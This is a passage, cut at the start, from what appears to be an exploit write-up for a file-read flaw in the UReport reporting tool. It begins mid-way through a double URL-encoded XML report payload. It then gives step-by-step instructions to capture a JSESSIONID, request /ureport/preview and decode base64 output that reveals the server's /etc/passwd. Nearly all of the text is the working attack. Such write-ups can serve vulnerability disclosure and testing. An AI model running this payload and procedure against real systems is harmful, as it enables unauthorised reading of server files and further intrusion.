DATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Crow%2520row-number%253D%25221%2522%2520height%253D%252218%2522%252F%253E%253Crow%2520row-number%253D%25222%2522%2520height%253D%252218%2522%252F%253E%253Crow%2520row-number%253D%25223%2522%2520height%253D%252218%2522%252F%253E%253Ccolumn%2520col-number%253D%25221%2522%2520width%253D%252280%2522%252F%253E%253Ccolumn%2520col-number%253D%25222%2522%2520width%253D%252280%2522%252F%253E%253Ccolumn%2520col-number%253D%25223%2522%2520width%253D%252280%2522%252F%253E%253Ccolumn%2520col-number%253D%25224%2522%2520width%253D%252280%2522%252F%253E%253Cpaper%2520type%253D%2522A4%2522%2520left-margin%253D%252290%2522%2520right-margin%253D%252290%2522%250A%2520%2520%2520%2520top-margin%253D%252272%2522%2520bottom-margin%253D%252272%2522%2520paging-mode%253D%2522fitpage%2522%2520fixrows%253D%25220%2522%250A%2520%2520%2520%2520width%253D%2522595%2522%2520height%253D%2522842%2522%2520orientation%253D%2522portrait%2522%2520html-report-align%253D%2522left%2522%2520bg-image%253D%2522%2522%2520html-interval-refresh-value%253D%25220%2522%2520column-enabled%253D%2522false%2522%253E%253C%252Fpaper%253E%253C%252Fureport%253E
    

Send the following request packet and obtain the JSESSIONID part of the Set-Cookie field in the header of the returned packet. 

Use the obtained JSESSIONID as a cookie to access /ureport/preview?\_u=p, and you can obtain the base64 encoded content of /etc/passwd in the img tag in the returned content.

Decrypt this base64 to get the actual content of /etc/passwd

Tag

#firefox